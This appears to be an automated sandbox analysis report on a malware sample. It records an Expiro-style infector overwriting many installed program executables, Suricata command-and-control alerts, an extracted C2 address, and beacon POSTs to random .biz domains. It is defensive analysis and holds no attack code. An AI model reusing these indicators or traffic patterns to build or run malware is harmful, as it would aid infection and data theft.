Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 4x nop then push rdi	0_2_00007FF6C75D4450
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 4x nop then push rdi	0_2_00007FF6C75D0200
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 4x nop then push rbx	0_2_00007FF6C75ACC30
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 4x nop then push rbx	0_2_00007FF6C757FAA0
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF6C75D7A90
Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF6C757F9C0
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 022B7394h	8_2_022B7188
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 022B78DCh	8_2_022B7688
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	8_2_022B7E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 022B78DCh	8_2_022B767A
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	8_2_022B7E5F
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	8_2_022B7FBC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 4x nop then jmp 064DBCBDh	22_2_064DBA40

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:60692 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:52171 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49741 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:50007 -> 34.227.7.138:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 212.162.149.53:2049

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Yara detected Generic Downloader

Source: Yara match

File source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE

Source: unknown

Network traffic detected: DNS query count 61

Source: global traffic	TCP traffic: 192.168.2.4:49732 -> 212.162.149.53:2049
Source: global traffic	TCP traffic: 192.168.2.4:49734 -> 51.195.88.199:587

Source: Joe Sandbox View	IP Address: 165.160.15.20 165.160.15.20
Source: Joe Sandbox View	IP Address: 3.254.94.185 3.254.94.185

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.4:49785
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.4:49785
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.4:49820
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.4:49820
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.4:49963
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.4:49963

Source: global traffic

TCP traffic: 192.168.2.4:49734 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /cxhmgtreorgudqu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /lfntrjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /crsx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /yyvfretnbpwpuxhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /qbfrwab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: GET /qbfrwab?usid=25&utid=8703404410 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: GET /f?usid=25&utid=8703404831 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /hspwddpejltixn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /elhlcfwgsepqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /ea HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /jbavyixtd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /kjfhq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /ikqjeeswprlgw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /lehnxi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /lnavxpry HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /yyix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /ckodyopddikmhbc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
Source: global traffic	HTTP traffic detected: POST /yq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 770
